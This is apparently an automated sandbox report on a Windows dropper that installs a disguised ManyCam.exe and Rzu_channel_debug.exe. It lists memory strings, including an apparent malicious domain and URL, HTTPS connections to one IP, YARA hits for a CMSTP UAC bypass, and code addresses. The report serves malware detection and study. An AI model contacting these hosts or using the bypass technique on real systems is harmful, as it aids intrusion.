Source: Rzu_channel_debug.exe, 0000000B.00000003.2320487418.0000000000485000.00000004.00000020.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000003.2309309798.0000000000485000.00000004.00000020.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000003.2270513933.0000000000485000.00000004.00000020.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000003.2283066654.0000000000485000.00000004.00000020.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000003.2331116179.0000000000485000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://nocaryesmoto1.website/mapbhaebnd
Source: Rzu_channel_debug.exe, 0000000B.00000003.2320487418.0000000000485000.00000004.00000020.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000003.2309309798.0000000000485000.00000004.00000020.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000003.2342963938.0000000000485000.00000004.00000020.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000003.2343858401.0000000000485000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://nocaryesmoto1.website/rCd
Source: Rzu_channel_debug.exe, 0000000B.00000003.2320487418.0000000000485000.00000004.00000020.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000003.2309309798.0000000000485000.00000004.00000020.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000003.2331116179.0000000000485000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://nocaryesmoto1.website:443
Source: Rzu_channel_debug.exe, 0000000B.00000003.2320636388.00000000004ED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://nocaryesmoto1.website:443/Scoreboard-10-2.html?gyqtjtyk3dtxh=siD2NpNyBsa1XljFEWgw6Zp36eo9C1P
Source: Rzu_channel_debug.exe, 0000000B.00000003.2283066654.0000000000485000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://nocaryesmoto1.website:443s_z
Source: Rzu_channel_debug.exe, 0000000B.00000002.2377933999.0000000007D9F000.00000004.00001000.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2377933999.0000000007D98000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org
Source: Rzu_channel_debug.exe, 0000000B.00000002.2377933999.0000000007D9F000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: ManyCam.exe, 00000001.00000002.1717306561.0000000004963000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000003.00000002.1772936818.0000000004485000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.2082750031.0000000005623000.00000004.00000800.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2371124217.000000000263A000.00000004.00000001.00020000.00000000.sdmp, ManyCam.exe, 0000000C.00000002.2154639347.000000000446F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.digicert.com/CPS0
Source: cmd.exe, 00000005.00000002.2082750031.0000000005623000.00000004.00000800.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2371124217.000000000263A000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.globalsign.com/repository/0
Source: Rzu_channel_debug.exe, 0000000B.00000002.2377933999.0000000007D98000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org
Source: Rzu_channel_debug.exe, 0000000B.00000002.2377933999.0000000007D9F000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: Rzu_channel_debug.exe, 0000000B.00000002.2377933999.0000000007D9F000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: Rzu_channel_debug.exe, 0000000B.00000002.2377933999.0000000007D9F000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: Rzu_channel_debug.exe, 0000000B.00000002.2377933999.0000000007D9F000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: Rzu_channel_debug.exe, 0000000B.00000002.2377933999.0000000007D9F000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49798
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown	Network traffic detected: HTTP traffic on port 49946 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49781 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49798 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49946
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49769

Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49747 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49758 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49769 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49775 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49781 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49787 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49798 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49946 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 14.2.cmd.exe.2b207f8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 14.2.cmd.exe.29f4a08.0.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 23.2.Rzu_channel_debug.exe.2707a20.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 5.2.cmd.exe.5629a00.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 23.2.Rzu_channel_debug.exe.274d6ed.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 21.2.cmd.exe.56b1acd.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 21.2.cmd.exe.566ca00.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 14.2.cmd.exe.4b11acd.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 5.2.cmd.exe.566eacd.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 11.2.Rzu_channel_debug.exe.2640a20.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 11.2.Rzu_channel_debug.exe.26866ed.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 11.2.Rzu_channel_debug.exe.2685aed.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 5.2.cmd.exe.566f6cd.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 23.2.Rzu_channel_debug.exe.274caed.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 14.2.cmd.exe.4acca00.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 21.2.cmd.exe.56b26cd.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 14.2.cmd.exe.4b126cd.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00007FF6EF6B903C: wcscpy,CreateFileW,CloseHandle,wcscpy,wcscpy,CreateDirectoryW,wcscpy,wcscpy,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,

0_2_00007FF6EF6B903C

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF6EF6C5008	0_2_00007FF6EF6C5008
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF6EF6C2550	0_2_00007FF6EF6C2550
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF6EF6D353C	0_2_00007FF6EF6D353C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF6EF6BADE8	0_2_00007FF6EF6BADE8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF6EF6D23F0	0_2_00007FF6EF6D23F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF6EF6B42C4	0_2_00007FF6EF6B42C4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF6EF6C9060	0_2_00007FF6EF6C9060
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF6EF6C8858	0_2_00007FF6EF6C8858
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF6EF6B903C	0_2_00007FF6EF6B903C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF6EF6C0120	0_2_00007FF6EF6C0120
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF6EF6B78E4	0_2_00007FF6EF6B78E4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF6EF6DCF94	0_2_00007FF6EF6DCF94
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF6EF6C9790	0_2_00007FF6EF6C9790
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF6EF6E9F68	0_2_00007FF6EF6E9F68
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF6EF6E6760	0_2_00007FF6EF6E6760
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF6EF6E3F44	0_2_00007FF6EF6E3F44
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF6EF6B2E60	0_2_00007FF6EF6B2E60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF6EF6CD650	0_2_00007FF6EF6CD650
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF6EF6B370C	0_2_00007FF6EF6B370C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF6EF6C4704	0_2_00007FF6EF6C4704
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF6EF6D0DAC	0_2_00007FF6EF6D0DAC
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF6EF6C2D78	0_2_00007FF6EF6C2D78
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF6EF6CCE2C	0_2_00007FF6EF6CCE2C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF6EF6B55F8	0_2_00007FF6EF6B55F8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF6EF6B7C4C	0_2_00007FF6EF6B7C4C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF6EF6DCD18	0_2_00007FF6EF6DCD18
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF6EF6E0CDC	0_2_00007FF6EF6E0CDC
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF6EF6C3394	0_2_00007FF6EF6C3394
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF6EF6C9378	0_2_00007FF6EF6C9378
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF6EF6E6290	0_2_00007FF6EF6E6290
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF6EF6C9AFC	0_2_00007FF6EF6C9AFC
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF6EF6C71AC	0_2_00007FF6EF6C71AC
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF6EF6B5A30	0_2_00007FF6EF6B5A30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF6EF6C39C4	0_2_00007FF6EF6C39C4
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe	Code function: 1_2_0050EC90	1_2_0050EC90
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe	Code function: 1_2_00BB31B0	1_2_00BB31B0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe	Code function: 1_2_00BD619B	1_2_00BD619B
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe	Code function: 1_2_00BDB1E0	1_2_00BDB1E0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe	Code function: 1_2_00BD01C0	1_2_00BD01C0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe	Code function: 1_2_00BD91C0	1_2_00BD91C0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe	Code function: 1_2_00BCB130	1_2_00BCB130
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe	Code function: 1_2_00BB7200	1_2_00BB7200
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe	Code function: 1_2_00BA8380	1_2_00BA8380
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe	Code function: 1_2_00BBE340	1_2_00BBE340
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe	Code function: 1_2_00BB7430	1_2_00BB7430
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe	Code function: 1_2_00BC1410	1_2_00BC1410
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe	Code function: 1_2_00BD640B	1_2_00BD640B
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe	Code function: 1_2_00BC35A0	1_2_00BC35A0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe	Code function: 1_2_00BB55F0	1_2_00BB55F0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe	Code function: 1_2_00BC85E2	1_2_00BC85E2
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe	Code function: 1_2_00BB6560	1_2_00BB6560
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe	Code function: 1_2_00BBE680	1_2_00BBE680
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe	Code function: 1_2_00BC26F0	1_2_00BC26F0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe	Code function: 1_2_00BC16C0	1_2_00BC16C0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe	Code function: 1_2_00BC7660	1_2_00BC7660
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe	Code function: 1_2_00BD9650	1_2_00BD9650
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe	Code function: 1_2_00BD57D0	1_2_00BD57D0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe	Code function: 1_2_00BCB720	1_2_00BCB720
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe	Code function: 1_2_00BD8740	1_2_00BD8740
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe	Code function: 1_2_00BA78C0	1_2_00BA78C0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe	Code function: 1_2_00BB6986	1_2_00BB6986
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe	Code function: 1_2_00BA0930	1_2_00BA0930
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe	Code function: 1_2_00BB7920	1_2_00BB7920
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe	Code function: 1_2_00BC9AF0	1_2_00BC9AF0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe	Code function: 1_2_00BCBAE0	1_2_00BCBAE0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe	Code function: 1_2_00BC7A10	1_2_00BC7A10
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe	Code function: 1_2_00BDABB0	1_2_00BDABB0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe	Code function: 1_2_00BD9B00	1_2_00BD9B00
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe	Code function: 1_2_00BD8CF0	1_2_00BD8CF0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe	Code function: 1_2_00BCEC10	1_2_00BCEC10
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe	Code function: 1_2_00BD5C10	1_2_00BD5C10
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe	Code function: 1_2_00BB3C40	1_2_00BB3C40
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe	Code function: 1_2_00BB5E3B	1_2_00BB5E3B
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe	Code function: 1_2_00BB4E30	1_2_00BB4E30
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe	Code function: 1_2_00BB6E10	1_2_00BB6E10
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe	Code function: 1_2_00BC7FB0	1_2_00BC7FB0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe	Code function: 1_2_00BBEF90	1_2_00BBEF90
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe	Code function: 1_2_00BCFF90	1_2_00BCFF90
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe	Code function: 1_2_00BACFF0	1_2_00BACFF0
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Code function: 3_2_0050EC90	3_2_0050EC90
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Code function: 3_2_00B86180	3_2_00B86180
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Code function: 3_2_00B861D9	3_2_00B861D9
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Code function: 3_2_00B762A0	3_2_00B762A0
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Code function: 3_2_00B86249	3_2_00B86249
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Code function: 3_2_00BC03F0	3_2_00BC03F0
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Code function: 3_2_00BB6440	3_2_00BB6440
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Code function: 3_2_00B86699	3_2_00B86699
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Code function: 3_2_00B9A630	3_2_00B9A630
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Code function: 3_2_00B5A640	3_2_00B5A640
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Code function: 3_2_00B86640	3_2_00B86640
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Code function: 3_2_00B84780	3_2_00B84780
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Code function: 3_2_00B8A710	3_2_00B8A710
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Code function: 3_2_00BD2710	3_2_00BD2710
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Code function: 3_2_00B86709	3_2_00B86709
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Code function: 3_2_00BA2800	3_2_00BA2800
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Code function: 3_2_00B96980	3_2_00B96980
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Code function: 3_2_00BAA970	3_2_00BAA970
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Code function: 3_2_00BAE970	3_2_00BAE970
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Code function: 3_2_00B52A90	3_2_00B52A90
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Code function: 3_2_00B9CAD0	3_2_00B9CAD0
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Code function: 3_2_00B88B40	3_2_00B88B40
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Code function: 3_2_00B72C90	3_2_00B72C90
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Code function: 3_2_00BBEC20	3_2_00BBEC20
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Code function: 3_2_00B86E60	3_2_00B86E60
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Code function: 3_2_00BBAFF0	3_2_00BBAFF0
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Code function: 3_2_00B9AFC0	3_2_00B9AFC0
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Code function: 3_2_00B96F52	3_2_00B96F52
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Code function: 3_2_00B96F54	3_2_00B96F54
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Code function: 3_2_00B870B0	3_2_00B870B0
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Code function: 3_2_00BAB0D8	3_2_00BAB0D8
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Code function: 3_2_00BAB177	3_2_00BAB177
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Code function: 3_2_00B95160	3_2_00B95160
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Code function: 3_2_00BBD2F0	3_2_00BBD2F0
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Code function: 3_2_00B952C7	3_2_00B952C7
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Code function: 3_2_00B8B220	3_2_00B8B220
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Code function: 3_2_00BD1240	3_2_00BD1240

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe 7C4EB51A737A81C163F95B50EC54518B82FCF91389D0560E855F3E26CEC07282

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe	Code function: String function: 00416740 appears 60 times
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe	Code function: String function: 004B77A0 appears 101 times
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe	Code function: String function: 004B76D0 appears 36 times
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe	Code function: String function: 00BC2CB0 appears 125 times
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe	Code function: String function: 0047BCF0 appears 141 times
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe	Code function: String function: 00BBB420 appears 79 times
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe	Code function: String function: 00BBB4C0 appears 178 times
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Code function: String function: 00BDD586 appears 35 times
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Code function: String function: 00416740 appears 90 times
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Code function: String function: 004B77A0 appears 101 times
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Code function: String function: 004B76D0 appears 36 times
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Code function: String function: 0041A3B0 appears 36 times
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Code function: String function: 00BDD568 appears 313 times
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Code function: String function: 0047BCF0 appears 141 times

Source: CrashRpt.dll.0.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: CrashRpt.dll.1.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: Rzu_channel_debug.exe.5.dr	Static PE information: Resource name: ZIP type: Zip archive data (empty)

Source: dawfefqddjbx.21.dr	Static PE information: Number of sections : 12 > 10
Source: ydoicpxmibx.5.dr	Static PE information: Number of sections : 12 > 10

Source: file.exe, 00000000.00000003.1699413519.0000019994585000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: OriginalFilenameManyCam.exeN vs file.exe

Source: 14.2.cmd.exe.2b207f8.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 14.2.cmd.exe.29f4a08.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 23.2.Rzu_channel_debug.exe.2707a20.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 5.2.cmd.exe.5629a00.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 23.2.Rzu_channel_debug.exe.274d6ed.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 21.2.cmd.exe.56b1acd.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 21.2.cmd.exe.566ca00.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 14.2.cmd.exe.4b11acd.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
